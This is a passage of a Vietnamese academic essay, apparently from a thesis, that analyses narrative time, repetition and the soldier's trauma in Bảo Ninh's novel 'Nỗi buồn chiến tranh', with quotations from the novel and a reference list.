Ra khỏi cuộc chiến với một tâm hồn hoang phế, Kiên đã trở thành một kẻ “dị mọ” cả thể xác lẫn tâm hồn. Kiên bị ám ảnh bởi quá khứ, bởi những cơn mơ nặng nhọc, đau đớn. Anh ngập chìm trong rượu, trong tăm tối, trở thành một tay nhà văn phường gàn dở. Vết thương tâm hồn Kiên mang về từ cuộc chiến không ngừng rỉ máu! Kiên thấy mình đã trở nên hoàn toàn sa đọa, đã trở nên thác loạn, đã ngập chìm trong tủi nhục, oán hờn và lú lẫn . Rồi càng ngày Kiên càng thấm thía “nỗi buồn chiến tranh”, “nỗi buồn được sống sót”. Một sự phi lí tột cùng, nhưng oái ăm thay nó lại là sự thực!

Bằng việc đi sâu khám phá những góc khuất trong tâm hồn người lính, Bảo Ninh đã không hề né tránh hiện thực của lịch sử cùng với những dư chấn của nó để viết lên những trang văn chân thực về những ám ảnh, bi kịch kéo dài của người lính cho đến tận thời hậu chiến – hiện thực tâm hồn bị chấn thương nặng nề sau chiến tranh.

Đảo thuật thời gian – cảm hứng lý giải, phân tích tư tưởng, tính cách nhân vật

Trong Nỗi buồn chiến tranh, việc nhà văn sử dụng thủ pháp đảo thuật thời gian đã mang lại hiệu quả thẩm mĩ sâu sắc cho tác phẩm – soi sáng quá khứ của nhân vật, từ đó góp phần lý giải, phân tích tư tưởng, tính cách của nhân vật.

Sau khi bước ra khỏi cuộc chiến, Kiên trở thành “kẻ xa lạ”, để cắt nghĩa tình trạng của anh, nhà văn đã để dòng hồi ức miên man, hỗn loạn cứ tự do lên tiếng, điều khiển Kiên. Một trong những sự kiện cứ đay nghiến anh mãi là những cuộc “hoang tình” trong đêm của đám trinh sát tại truông Gọi Hồn đã để lại trong Kiên nhiều suy tư. Anh không nhìn mối quan hệ giữa ba cô gái và những đồng đội của mình một cách méo mó. Chính tại cảnh huống này mà anh đã ngộ ra rằng: chiến tranh vừa có phần khốc liệt, đồng thời cũng đầy ắp lòng nhân ái, đức hi sinh: “Biết hết, và vì thế, lí ra là chỉ huy, anh cần ngăn chặn hiện tượng vô kỉ luật quá quẩn này (…). Song trái tim anh, trái tim của anh, trái tim thực thụ của người lính không đời nào cho phép anh ra tay hành động như vậy. Không những năn nỉ anh mà nó buộc anh phải im lặng, buộc anh phải hết lòng cảm thông. Chứ còn biết làm gì khác được, trước tiếng gọi man sơ, hoang dã của tuổi thanh xuân?”.

Chiến tranh một mặt có thể tôi luyện ý chí, niềm tin của con người nhưng mặt khác sự khốc liệt của chiến tranh làm con người mất đi niềm tin, trở nên vô cảm và có lúc không còn chú ý tới việc giữ gìn nhân tính. Đối với những người lính may mắn chưa gặp “lưỡi hái tử thần” thì sự đày ải trong chiến tranh khiến họ suy sụp:

“ Tôi (Can) không sợ chết, nhưng cứ bắn mãi giết mãi thế này thì chết hoại tình người. Dạo này đêm nào tôi cũng mộng thấy mình chết và bơi ra khỏi xác biến thành con ma cà rồng đi hút máu người. Anh còn nhớ trận Plâycần năm 72 không? Có nhớ cảnh thây người la liệt trong khu gia binh không? Máu tới bụng chân, lội lõm bõm… Tôi vẫn tự nhủ là tránh giết người bằng giao lê, nhưng mà quen tay mất rồi” .

Còn dưới đây là dòng suy nghĩ của Kiên sau khi nghe Can:

“Kiên tò mò nhìn Can. Trong quân ngũ thỉnh thoảng lại thấy tòi ra vài tay dị giáo kiểu này. Tâm hồn bấn loạn, ngôn ngữ độc thoại rối mù, họ bị thực cảnh chiến tranh đầy ải tàn nhẫn, làm cho suy sụp sâu sắc cả về thể xác lẫn tinh thần”.

Rõ ràng, dòng suy nghĩ trên đây của Kiên thể hiện nhận thức của anh về sự thay đổi của Can. Trước đây, Kiên thấy Can vốn không dài dòng dòng triết lí, vốn mang “bản chất con nhà nông thích hợp tuyệt đối với cảnh địa ngục chiến hào”. Cho nên, Kiên không ngờ Can lại có thể có những lời lẽ đầy tính triết lí và tràn ngập sự bi quan như thế và “đã mang thân làm thằng lính B3 mà lại hay kêu rên và mau nước mắt thì khốn nạn càng thêm khốn nạn Can ạ”. Ở đây, sự thay đổi về tính cách cũng như nhận thức của Can đã giúp Kiên hiểu ra rằng: chính sự đày ải của thực cảnh chiến tranh đã khiến cho những người lính như Can suy sụp tinh thần đến vậy.

Tốc độ trần thuật chậm – sự suy ngẫm, triết lý của nhân vật trong hành trình “đi tìm thời gian đã mất”

Trong Nỗi buồn chiến tranh, quá khứ được nhà văn tái hiện lại thông qua dòng hồi ức của nhân vật Kiên. Trong dòng hồi ức ấy, những quãng đời về tuổi thơ, tuổi học trò, về một Hà Nội thuở bình yên, về mười năm quân ngũ với biết bao gương mặt thân thương của người thân và đồng đội… lần lượt hiện về trong kí ức Kiên với một nỗi ám ánh khôn xiết như một duyên nợ của cuộc đời mà anh phải trả. Nhưng trong hành trình “đi tìm thời gian đã mất” ấy, càng trở lại quá khứ thì Kiên càng cảm nhận một cách rõ ràng hơn, thấm thía hơn “nỗi buồn” trong lòng: “nỗi buồn chiến tranh”, nỗi buồn tình yêu và nỗi buồn sáng tạo. Hơn nữa, tốc độ trần thuật chậm trong tác phẩm đã tạo cho nhịp kể của truyện một tính chất hồi cố, trăn trở, góp phần kéo giãn mạch truyện làm cho dòng cảm xúc, cũng như những suy ngẫm, triết lý của nhân vật được giãi bày, thổ lộ trong những cảm nhận về chiến tranh, về tình yêu và sáng tạo nghệ thuật.

Kiên, kẻ sống sót lạ lùng sau bao hiểm nguy luôn mang trong mình dư âm của cái chết. Với anh cái chết “vừa mơ hồ, vừa sâu xa hơn người sống. Họ cô đơn, trầm lắng và kì diệu như ảnh ảo. Và đôi khi hồn người chết trận hóa thành âm thanh chứ không phải hình bóng”. Và “theo dần năm tháng những luồng sinh khí chết ấy đã đậm lại trong lòng anh hòa tiềm thức trở thành bóng tối của tâm hồn anh” . Qua những năm tháng gian khổ, Kiên trở thành kẻ sống sót dai dẳng như có sự bảo hộ mơ hồ của “định mệnh”. Nhưng “cái giá của sự may mắn ấy là anh đã lần lượt mất hết những người bạn, người anh em, người đồng đội chí thiết nhất. Họ bị giết ngay trước mặt kiên hoặc đã chết ngay trong vòng tay của anh. Nhiều người đã chết để gỡ cho tính mạng của Kiên”.

Bằng sự trải nghiệm từ chính cuộc đời của người lính chiến, Kiên đã đưa ra định nghĩa về chiến tranh thật rùng rợn: “Chiến tranh là cõi không nhà, không cửa, lang thang khốn khổ và phiêu bạt vĩ đại, là cõi không đàn ông, không đàn bà, thế giới bạt sầu vô cảm và tuyệt tự khủng khiếp nhất của dòng giống con người”. Trong cảm nhận, suy nghĩ của Kiên thì chiến tranh là một cái gì đó rất khủng khiếp và ghê sợ. Nó không mang khuôn mặt phụ nữ, không mang khuôn mặt trẻ em và nói chung là không có bộ mặt con người. Nó đã hủy diệt con người cả tinh thần lẫn thể xác.

Với Kiên tất cả những điều đã thấy trong chiến tranh thì cái làm anh day dứt nhất đó là sự hi sinh của đồng đội. Anh suy nghĩ : “Một người ngã xuống để những người khác sống, điều đó chẳng có gì mới, thật thế. Nhưng khi anh và tôi thì sống còn những người ưu tú nhất, tốt đẹp nhất, những người xứng đáng hơn ai hết quyền sống trên cõi dương gian này đều gục ngã, bị nghiền nát, bị cỗ máy đẫm máu của chiến trận chà đạp, đày đọa (…), những tổn thất mất mát có thể bù đắp, các vết thương sẽ lành, đau khổ sẽ hóa thạch nhưng nỗi buồn về cuộc chiến tranh thì sẽ càng ngày càng thấm thía hơn, sẽ không bao giờ nguôi”. Anh cho rằng tất cả sẽ mờ đi theo năm tháng của thời gian nhưng nỗi buồn thì mãi mãi vẫn còn và in đậm trong tâm hồn con người. Với những trải nghiệm của mình, Kiên đã có rất nhiều những suy ngẫm, triết lý về cuộc sống: “Các bạn hãy tin tôi: Trong lòng cái chết không phải là địa ngục khủng khiếp, trong lòng cái chết vẫn là cuộc sống, dĩ nhiên là một kiểu khác của cuộc sống kia. Trong lòng cái chết ta có được sự bình yên, sự thanh thoát và tự do chân chính…” . Kiên luôn dằn vặt với bản thân mình nên anh phải tự triết lý, chiêm nghiệm để cho tâm hồn mình được thanh thản hơn. Qua những dòng cảm xúc, suy ngẫm ấy, chúng ta có thể cảm nhận được ở anh một con người đang phải chịu bao nhiêu nỗi buồn không sao xóa được.

Cùng với kí ức về chiến tranh, kí ức về tình yêu cũng luôn rạo rực, bùng cháy trong tâm tưởng Kiên. Nếu như chiến tranh đánh thức trong Kiên sự tàn bạo và hủy diệt thì những người phụ nữ từ Hạnh cho đến Phương, người nữ y tá trong Điều trị 8, Lan Đồi Mơ, Hiền… lại đánh thức trong anh tình yêu – một tình yêu mà cho đến tận cuối cuộc đời anh, vĩnh viễn không trọn vẹn. Tình yêu, trong ký ức của Kiên, là mối tình tuyệt đẹp mà đau xót với cô bạn học Phương. Bị cuốn vào vòng xoáy nghiệt ngã của cuộc chiến, tình yêu cũng bị đày đọa, bị đẩy tới bờ vực của sự hủy diệt. Những suy nghĩ của Kiên trên chuyến tàu định mệnh năm xưa đã cho thấy vết rạn nứt trong tình cảm của họ: “Thì ra những tai họa ráng xuống đời hai đứa, đối với Phương có vẻ không hề là tai họa. Kiên nghĩ. Trái lại dường như nàng chỉ coi đó là những yếu tố mới trong cuộc sống mà nàng sẵn sàng đón nhận và thích nghi, thậm chí khá hài lòng” . Mối tình của họ mãi mãi là mối tình đau khổ, không thành với những vết thương không thể chữa lành trong thời bình. Thế nhưng cái duy nhất mà nàng không bao giờ đánh mất là tình yêu giành cho Kiên. Tình yêu của Kiên và Phương như là biểu tượng của cái đẹp, đối lập với chiến tranh khốc liệt. Trong cuộc chiến đẫm máu, lạnh lùng, “vị ngọt của vị sữa trinh nữ đã cho anh sinh lực để trở thành kẻ mạnh nhất, nhiều hồng phúc nhất trong chiến tranh – trở thành kẻ sống sót” .

Tình yêu của Kiên trong trắng và si mê lạ lùng. Tình yêu đã bảo hộ và cứu rỗi anh qua những khoảnh khắc cô đơn nhất của chiến tranh. Chính những giấc mộng về tình yêu là sợi dây mong manh nhưng bền chặt níu giữ anh lại với cuộc đời. Nhiều khi đứng bên dòng sông Mê “mấp mé bên bờ vực của cái chết”, Kiên vẫn nghe văng vẳng tiếng gọi của Phương trong ánh hoàng hôn cay đắng năm nào. Tình yêu vẫn bảo hộ Kiên thoát khỏi cái chết. Song, cay đắng thay, Phương “đã bỏ ra đi vào đầu mùa đông”. Hai cái lạnh song trùng thấu buốt tim anh – một mùa đông đơn côi, một sự ra đi “đau đớn, đột ngột và độc địa”. Từ khi mất Phương, Kiên càng dấn sâu vào mộng mị, hết cơn mơ này đến giấc mộng khác, nhớ Phương làm anh nhớ chiến tranh “mảnh đời còn lại sau mười năm bị lửa đạn của chiến tranh văm xé lại bị móng vuốt của tình yêu xéo nát”. Nhưng dù phải chịu khổ đau, dù có phải xé nát ra từng mảnh Kiên vẫn khát khao Phương trở về, bởi với anh, Phương vẫn là toàn bộ cuộc đời. Phương ra đi nhưng tiếng gọi tình yêu của Phương “mãi mãi còn đó, chờ đợi anh trên đường quá khứ”.

Với Nỗi buồn chiến tranh, tác giả đã để cho nhân vật đưa ra nhiều triết lý về cuộc sống xung quanh. Kiên là người đã đi qua cuộc chiến tranh ác liệt của dân tộc, anh đã nếm đủ ngọn ngành của mọi nỗi đau trong chiến tranh. Bởi vậy mà khi trở về với cuộc sống thực tại, anh cũng không thể nào nguôi nổi được những đau đớn trong quá khứ. Anh luôn sống trong những ám ảnh, những hồi tưởng về quá khứ, và anh đã thú nhận rằng: “Cuộc đời tôi kì thực có khác nào con thuyền bơi ngược dòng sông không ngừng bị đẩy lùi về dĩ vãng. Đối với tôi tương lai đã nằm lại ở phía sau xa kia rồi và không phải là cuộc sống mới, thời đại mới không phải là những hi vọng về tương lai tốt đẹp đã cứu giúp tôi, mà trái lại những tấm thảm kịch của quá khứ đã nâng đỡ hồn tôi, tạo sức mạnh tâm hồn cho tôi thoát khỏi vô tận những tấn trò đời hôm nay” . Ra khỏi chiến tranh là người chiến sĩ, Kiên tự thấy mình có nghĩa vụ, sứ mệnh thiêng liêng cao cả mà số phận trao cho anh chính là bắt anh phải trở thành nhân chứng để nói lên một thời đại lịch sử của thế hệ mình. “Viết lại có nghĩa là sống lại” [37,6], cho nên phải viết những gì đã qua, những gì anh từng chứng kiến. Chính ý thức sứ mệnh hay “thiên mệnh” ấy đã chi phối việc chọn đề tài của Kiên: “Đấy, cần phải viết về chiến tranh trong niềm thôi thúc ấy, viết sao cho xao xuyến nổi lòng dạ, xúc động nổi trái tim con người như thể viết về tình yêu, về nỗi đau sao cho có thể truyền được vào cuộc sống đương thời luồng điện của những xúc cảm chỉ có thể diễn đạt bằng quá khứ của quá khứ” . Kiên đã viết không chỉ để tìm lại chính mình mà còn “đi tìm thời gian đã mất”, tìm lại chân dung của đồng đội, của cả một thế hệ các anh trong quá khứ. Những gương mặt của những người thân yêu lần lượt trở về trên những trang bản thảo như một sự khẳng định giá trị của quá khứ với cuộc sống hiện tại, nó luôn là điểm tựa, là niềm an ủi khiến Kiên có niềm tin vào những gì tốt đẹp không thể mất được của cuộc sống đã qua. Bằng sự từng trải, bằng những chiêm nghiệm của cuộc đời mình. Kiên tin rằng: “Chiến tranh không tiêu diệt được cái gì hết mà nó chỉ như ngọn lửa thử vàng để cho tình yêu, tình đồng đội càng thêm sâu đậm. Tất cả vẫn còn lại đó, vẫn y nguyên (…), tất cả những ai bị chiến tranh làm cho biến đổi, họ vẫn mãi mãi như là họ trong quá khứ” . Thông qua những suy ngẫm, triết lý của nhân vật mà tác giả muốn gửi gắm đến người đọc những bức thông điệp giàu chất nhân văn về số phận con người, về cuộc sống hiện thực.

Sống ngột ngạt trong cõi đời như một kẻ mộng du miên man “đi tìm thời gian đã mất”, Kiên trở thành kẻ mắc kẹt không lối thoát. Anh đắm chìm trong những giấc mộng không đầu không cuối về chiến tranh, về tình yêu, về “thiên mệnh” sáng tạo nghệ thuật. Dường như anh đã cảm nhận cuộc sống bằng nỗi buồn dằng dặc, nỗi buồn không tìm được sự đồng cảm sẻ chia. Với lối kể chuyện chậm rãi, kể tỉ mỉ về từng sự kiện, chi tiết, “Nỗi buồn chiến tranh là nhịp điệu của một con tàu lầm lũi trong đêm trường, trên đó có một con người “đi tìm thời gian đã mất”” [61].

Nhà văn đã để cho nhân vật lên tiếng và nói về những suy nghĩ, những điều thầm kín trong con người họ. Để từ đó, người đọc nhìn nhận được sâu hơn về suy nghĩ, số phận của nhân vật. Có thể nói, những suy ngẫm, triết lý của Kiên trong hành trình “đi tìm thời gian đã mất” đã đem lại cho Bảo Ninh một cái nhìn sâu sắc hơn về các vấn đề của đời sống và tạo cho trang văn mang đậm màu sắc chính luận giàu chất trí tuệ. Điều đó, đã thể hiện được nỗi lo âu, sự trăn trở của nhà văn trước cuộc đời, trước con người. Ngòi bút của ông đã hòa cùng những trăn trở suy tư, những băn khoăn, dằn vặt của nhân vật về một quá khứ đau buồn không thể nào nguôi quên.

Nỗi buồn chiến tranh“nỗi buồn nguyên khối có khả năng thanh lọc tâm hồn con người” [28,105]. Nỗi buồn ấy là dòng hồi ức mãnh liệt xen lẫn nhu cầu tự vấn lương tâm, phán xét mình, một cuộc truy tìm chân lí riết róng, đau khổ nhưng đẹp đẽ, với tư cách là một người lính, một người viết văn vì thế hệ mình, vì đồng đội thân yêu của mình, vì những hi sinh thầm lặng và vô cùng to lớn của dân tộc mình.

Trần thuật trùng lặp – những nỗi đau không bao giờ nguôi về thân phận con người trong chiến tranh

“Văn học và đời sống là hai vòng tròn đồng tâm mà tâm điểm của nó là con người” (Nguyễn Minh Châu). Một tác phẩm văn học có giá trị thẩm mĩ, giá trị sáng tạo đích thực phải thể hiện một quan niệm nghệ thuật về con người, tức nhà văn thể hiện trong tác phẩm của mình “sự lí giải, cắt nghĩa, sự cảm thấy con người đã hóa thân thành các nguyên tắc, phương tiện, biện pháp thể hiện con người trong văn học, tạo nên giá trị nghệ thuật và thẩm mĩ cho các hình tượng nhân vật” [56,41]. Phương thức trần thuật trùng lặp (sự lặp lại của các biểu tượng, mô típ, hình ảnh (mưa, đêm, cái chết, giấc mơ), từ ngữ, cú pháp, nhân vật…) cũng chính là một hình thức nghệ thuật để hiện thực hóa quan niệm nghệ thuật về con người của Bảo Ninh trong Nỗi buồn chiến tranh – quan niệm về thân phận con người trong chiến tranh.

Nếu “số phận” là “sự sống, sự tồn tại dành cho mỗi người, mỗi sự vật” [51,866] thì “thân phận” là “địa vị xã hội thấp hèn và cảnh ngộ không may mà con người không sao thoát khỏi được” [51,924]. Thân phận con người trong Nỗi buồn chiến tranh bị chi phối bởi cuộc chiến tranh tàn khốc, hủy diệt và “chiến tranh chính là “cảnh ngộ không may mà con người không sao thoát khỏi được” của những con người trong Nỗi buồn chiến tranh” [69,50]. Đó là Kiên, Phương, là Cừ, Từ, Tâm, Hòa, Can, Quảng, là những cô gái, những người chiến sĩ đêm đêm tìm đến với nhau …

Chiến tranh do con người tạo ra chứ không phải do một lực lượng siêu nhiên, duy tâm nào quyết định. Nhưng ám ảnh về chiến tranh cùng với những nỗi đau lại như một thứ “định mệnh” đối với thân phận con người. Những câu văn, những biểu tượng, mô típ, hình ảnh (mưa, đêm, cái chết, giấc mơ), những người đồng đội vào sinh ra tử… cứ trở đi trở lại, xuất hiện liên tiếp trong Nỗi buồn chiến tranh. Nó giống như dòng chảy thân phận, một thân phận không thể khác của con người với vết thương chiến tranh và những ám ảnh về nó – những nỗi đau không bao giờ nguôi về thân phận con người trong chiến tranh.

Trong Nỗi buồn chiến tranh, thông qua cảm nhận của Kiên và các nhân vật khác, những định nghĩa về chiến tranh liên tiếp được đưa ra nhưng tất cả đều nhuốm màu khổ đau, chết chóc, bạo tàn:

“Chiến tranh là cõi không nhà, không cửa, lang thang khốn khổ và phiêu bạt vĩ đại, là cõi không đàn ông, không đàn bà, thế giới bạt sầu vô cảm và tuyệt tự khủng khiếp nhất của dòng giống con người” .

“Chiến tranh là nơi dành cho thói hiếu sát. Máu hung tàn. Tâm lí thú rừng. Ý chí tối tăm và lòng dạ gỗ đá” .

Qua những định nghĩa về chiến tranh, nhà văn đã đi sâu khai thác những mặt trái của cuộc chiến. Đó là những hi sinh mất mát, những nỗi đau dai dẳng được thể hiện qua thân phận của người lính. Trong Nỗi buồn chiến tranh, cái chết của những người lính cách mạng được miêu tả từ góc nhìn thân phận. Trong những giấc mơ không đầu, không cuối, trong vùng kí ức mơ tối về chiến tranh của Kiên đâu đâu cũng rợn ngợp xác chết. Những ngày tháng trở về với truông Gọi Hồn đầy máu, đầy âm khí, Kiên đã ngược thời gian tìm về những đoạn kí ức mong manh. Những cái chết thảm khốc của đồng đội và giờ đây tất cả những âm hồn còn lởn vởn trong không gian và soi bóng bên anh trong từng phút giây khắc khoải của cuộc đời. Đó là cái chết của Từ – người đã hi sinh tính mạng để lấp đầy cho một giây phút chần chừ của Kiên ở Lăng Cha Cả, cứu sống Kiên khỏi phải hứng chịu loạt đạn trước họng súng của kẻ bên kia chiến tuyến vừa kịp bắn ra. Đó cũng là cái chết của Cừ – người chiến sĩ đã nổ súng bắn chặn cả một trung đội địch cho nhóm trinh sát của Kiên rút chạy sau một cú đột nhập vào sở chỉ huy địch không thành. Đó còn là cái chết của Tâm – người đã dũng cảm giữ lấy tên ngụy cho Kiên và đồng đội chạy trốn khỏi họng súng đen ngòm của kẻ địch đang hướng tới. Nhưng trong đời lính chiến, có lẽ “kỉ niệm bi thảm, thương tâm, hiểm nghèo nhất trong kí ức chiến tranh của Kiên là kỉ niệm về Hòa” – cô giao liên xinh đẹp, người Hải Hậu. Vào những tháng ngày ác liệt nhất của bể khổ Mậu Thân 1968, Hòa đã kịp thời nhử bọn địch về phía mình để cứu Kiên và đoàn thương binh thoát khỏi vòng vây hiểm nghèo. Để rồi Hòa phải hi sinh trong sự dày vò của những tên lính Mĩ da đen “như một bầy vượn khổng lồ” trước con mắt bất lực của Kiên.

Bên cạnh những con người anh hùng xả thân vì đồng đội, những cái chết của người lính với tư cách là một con người bình thường cũng luôn để lại trong lòng Kiên những nỗi đau day dứt, không nguôi về thân phận của con người trong chiến tranh. Can – người đồng đội đảo ngũ của Kiên đã chết trên đường chạy trốn về quê mẹ khi mà miền đất anh ta ao ước trở về còn xa lắm. Hay là Quảng – người tiểu đội trưởng đầu tiên của Kiên bị thương trong một trận đánh chiến dịch Đông Sa Thầy. Vì quá đau đớn, Quảng đã kết liễu nỗi đau thể xác bằng quả lựu đạn giật được từ bên hông Kiên. Tiếng cười cuồng loạn của Quảng xoáy sâu vào tâm trí Kiên như tiếng vọng của nỗi đau cùng cực mà người lính phải chịu đựng trên bước đường tìm về cái chết. Chiến tranh là thứ đêm đen, dài đặc, khủng khiếp nhất bủa vây lấy thân phận con người. Nhưng có lẽ ám ảnh, day dứt nhất của hiện thực chiến tranh dường như đọng lại trong kí ức Kiên là cái chết của tiểu đoàn 27, mùa khô năm 1969 mà Kiên là một trong số ít người sống sót. Sau trận bại vong ấy, biết bao những hồn ma lang thang khắp các bụi bờ ven rừng và truông núi vô danh từ bấy mang tên Gọi Hồn.

Mỗi nhân vật trong Nỗi buồn chiến tranh là một số phận, một mảnh đời riêng, nhưng dường như tất cả đều xoay quanh cái cơ cực, khổ đau của cuộc sống chiến tranh. Qua đó, chúng ta càng thấm thía hơn những số phận nhỏ bé của con người trước thế lực hủy diệt bạo tàn của chiến tranh. Những hình ảnh về hồn ma, máu, cái chết được điệp trùng, thậm chí là không gian mưa, thời gian “đêm” được lặp lại đã tạo nên sự dồn nén, ám ảnh về tính chất khốc liệt và hủy diệt của chiến tranh. Chiến tranh là thứ định mệnh bủa vây, bám riết, đeo đẳng thân phận con người. Những gương mặt người lính chiến xuất hiện trong Nỗi buồn chiến tranh hiện lên với đủ lứa tuổi, nghề nghiệp, nhiều cá tính, nhiều vùng quê, thậm chí ở các chiến tuyến khác nhau… nhưng tất cả họ đều có chung một thân phận, “một địa vị thấp hèn”, “con sâu cái kiến” trong chiến tranh. Những cái chết được nhắc đi nhắc lại với nhiều cách thức, nhiều phương thức là nhằm làm nhấn mạnh sự bất lực, bất khả kháng của con người trong chiến tranh.

Cùng với vết thương chiến tranh, những ám ảnh về quá khứ, trong đó quá khứ chiến tranh cũng là nỗi day dứt không cùng trong tâm hồn của người lính chiến – Kiên. Liên tiếp những từ ngữ, hình ảnh chỉ dòng thời gian quá khứ: từ đó, thời ấy, hồi đó, chiều hôm ấy, hồi xưa, năm ấy, ngày trước… được lặp lại. “Đêm”, “mưa” cũng là thứ môi trường di dưỡng quá khứ trong Kiên. Hiện tại bị quá khứ hóa, còn

tương lai bị quá khứ làm cho nhòe mờ. Kiên sống ở hiện tại nhưng quá khứ luôn bấu víu lấy anh bằng những bóng ma, những cái chết lặp lại. Mỗi lần nhắm mắt dọi vào hồi ức, Kiên không sao quên được hình ảnh ba cô gái bị bọn thám báo hãm hiếp và giết chết. Anh luôn bị ám ảnh bởi câu chuyện tình mông muội giữa các chiến sĩ, đồng đội của anh với ba cô gái tăng gia của huyện đội 67 nơi núi rừng sâu thẳm của đại ngàn, ghim vào lòng Kiên như một vết xước: “Hòa bình chẳng qua là thứ cây mọc lên từ máu thịt anh em mình, để từ lại chút xương mà những người được phân công nằm lại gác rừng, lại là những người đáng sống nhất” . Để có được hòa bình thì dân tộc ta phải mất đi bao nhiêu là người con, họ đã đổ biết bao xương máu của mình để có được ngày hôm nay. Sự lặp lại liên tiếp của các biểu tượng, mô típ, hình ảnh (mưa, đêm, cái chết, giấc mơ), sự lặp lại một từ một câu, một trạng thái, một cảnh ngộ hay cách lặp lại của một thời gian, một không gian trong Nỗi buồn chiến tranh, vừa là nhịp điệu của dòng hồi ức nhiều day dứt về quá khứ chiến tranh đầy ám ảnh, vừa tái hiện một thế giới mà trong đó thân phận con người như bị vỡ vụn, nghiền nát trước sự giày xéo tàn khốc của chiến tranh.

Trải qua tất cả thời khắc kinh hoàng của chiến tranh, Kiên – kẻ sống sót lạ lùng sau bao nhiêu hiểm nguy luôn mang trong mình dư âm của cái chết với những nỗi đau không cùng về thân phận nhỏ bé của con người trong chiến tranh. “Những cái chết “của Kiên” đa dạng nhiều màu vẻ, giàu sắc khí và sinh động hơn người”. “Theo dần năm tháng những luồng sinh khí chết ấy đã đậm lại trong lòng anh hòa tiềm thức trở thành bóng tối của tâm hồn anh. Dằng dặc trôi qua trong hồi ức của Kiên vô vàn những hồn ma thân thiết lẳng lặng âm thầm kéo lê mãi trong đời anh với nỗi đau buồn dai dẳng, không nguôi”.

Có thể nhận thấy rằng, bản thân nhan đề Nỗi buồn chiến tranh đã gợi lên cảm hứng thân phận. Đó là nỗi đau, nỗi mất mát, nỗi ám ảnh kinh hoàng của người lính về sự tàn khốc, hủy diệt của chiến tranh. Hơn nữa, phương thức trần thuật trùng lặp trên nhiều bình diện của tác phẩm đã khẳng định một lần nữa ý niệm về thân phận cho cuốn tiểu thuyết – thân phận con người trong chiến tranh.

        Nỗi buồn chiến tranh cuốn người đọc vào thế giới của những giấc mơ, những kí ức gãy vụn, những ám ảnh của chiến trận, của nỗi đau tình yêu tan vỡ, của nỗi buồn thân phận, của những nỗi niềm nuối tiếc đam mê tạo nên dư âm về một “nỗi buồn chiến tranh mênh mông cao cả” trong lòng người đọc.

TÀI LIỆU THAM KHẢO

Tiếng Việt

  1. Thái Phan Vàng Anh (2009), Thời gian trần thuật trong tiểu thuyết Việt Nam

     đương đại, Tạp chí Khoa học, Đại học Huế (54), tr. 5-15.

  1. Thái Phan Vàng Anh (2010), Người kể chuyện trong tiểu thuyết Việt Nam đương đại, Luận án Tiến sĩ Văn học, Viện Văn học, Hà Nội.
  2. Nguyễn Thị Vân Anh (2011), Diễn biến của thời gian tự sự trong tiểu thuyết Ma Văn Kháng, Luận văn Thạc sĩ, Trường Đại học Sư phạm Hà Nội.
  3. Nguyễn Thị Ánh (2008), Phía Tây không có gì lạ và Nỗi buồn chiến tranh, Luận văn Thạc sĩ, Trường Đại học Sư phạm Hà Nội.
  4. Nguyễn Thị Bình (1996), Những đổi mới văn xuôi nghệ thuật Việt Nam sau 1975, Luận án phó Tiến sĩ Ngữ văn, Trường Đại học Sư phạm Hà Nội.
  5. Trần Duy Châu (1994), Từ đâu đến “Nỗi buồn chiến tranh”?, Tạp chí Cộng sản (10), tr. 54-55.
  6. Đào Thị Cúc (2009), Không gian và thời gian nghệ thuật trong tiểu thuyết Lê Lựu thời kì đổi mới, Luận văn Thạc sĩ, Trường Đại học Khoa học xã hội và Nhân văn, Hà Nội.
  7. Khương Thị Thu Cúc (2002), Dòng ý thức của nhân vật trung tâm trong tiểu thuyết Thân phận của tình yêu, Báo cáo khoa học, Trường Đại học Sư phạm Hà Nội.
  8. Trần Thị Hồng Duyên (2007), Điểm nhìn nghệ thuật trong tiểu thuyết Thân phận của tình yêu (Bảo Ninh), Báo cáo khoa học, Trường Đại học Sư phạm Hà Nội.
  9. Nguyễn Đăng Điệp (2004), “Kĩ thuật dòng ý thức qua Nỗi buồn chiến tranh của Bảo Ninh”, Tự sự học – một số vấn đề lí luận và lịch sử, phần 1, Nxb Đại học Sư phạm Hà Nội, tr. 399- 408.
  10. Đặng Anh Đào (1995), Đổi mới nghệ thuật tiểu thuyết phương Tây hiện đại, Nxb Giáo dục, Hà Nội.
  11. Lê Bá Hán, Trần Đình Sử, Nguyễn Khắc Phi (đồng chủ biên) (1992), Từ điển thuật ngữ văn học, Nxb Giáo dục, Hà Nội.
  12. Đỗ Đức Hiểu (2006), Thi pháp hiện đại, Nxb Hội Nhà văn, Hà Nội.
  13. Trần Quốc Hội (2007), Tìm hiểu trình tự thời gian nghệ thuật của Ăn mày dĩ vãng và Nỗi buồn chiến tranh – tiếp cận từ lý thuyết thời gian của Genette, Tạp chí Sông Hương (225), tr. 16 – 21.
  14. Trần Quốc Hội (2011), Cách xử lý thời gian trong Nỗi buồn chiến tranh của Bảo Ninh, Nguồn: Vanck21dhsphue.blogspot.com.
  15. Nguyễn Thái Hòa (2000), Những vấn đề thi pháp của truyện, Nxb Giáo dục, Hà Nội.
  16. Đào Duy Hiệp (2008), “Thời gian trong Thân phận của tình yêu của Bảo Ninh”, Phê bình văn học từ lí thuyết hiện đại, Nxb Giáo dục, Hà Nội.
  17. Đào Duy Hiệp (2008), Phê bình văn học từ lý thuyết hiện đại, Nxb Giáo dục, Hà Nội.
  18. Đào Duy Hiệp (2003), Thời gian trong “Đi tìm thời gian đã mất” của Marcel Proust, Luận án Tiến sĩ Ngữ văn, Trường Đại học Khoa học xã hội và Nhân văn, Hà Nội.
  19. Lê Thị Tuyết Hạnh (1997), Thời gian tự sự như một nhân tố cấu trúc văn bản văn xuôi nghệ thuật (xét qua các truyện ngắn Việt Nam giai đoạn 1975 – 1995), Luận án phó Tiến sĩ, Trường Đại học Sư phạm Hà Nội.
  20. Trần Thanh Hiên (2011), Thời gian trần thuật trong Âm thanh và cuồng nộ của William Faulkner, Nguồn: 123doc.vn.
  21. Lê Thị Thanh Huyền (2006), Ý thức về nhịp điệu trong một số tiểu thuyết Việt Nam thời đổi mới, Luận văn Thạc sĩ, Trường Đại học Sư phạm Hà Nội.
  22. Nguyễn Thị Hoàn (2010), Thời gian tự sự trong tiểu thuyết Dưới chín tầng trời của Dương Hướng, Luận văn Thạc sĩ, Trường Đại học Sư phạm Hà Nội.
  23. Hoàng Thúy Hằng (2010), Lời nói bên trong trong Nỗi buồn chiến tranh, Luận văn Thạc sĩ, Trường Đại học Sư phạm Hà Nội.
  24. Trần Thị Huệ (2007), Hình tượng người phụ nữ trong tiểu thuyết “Thân phận của tình yêu” – Bảo Ninh, Khóa luận tốt nghiệp, Trường Đại học Sư phạm Hà Nội.
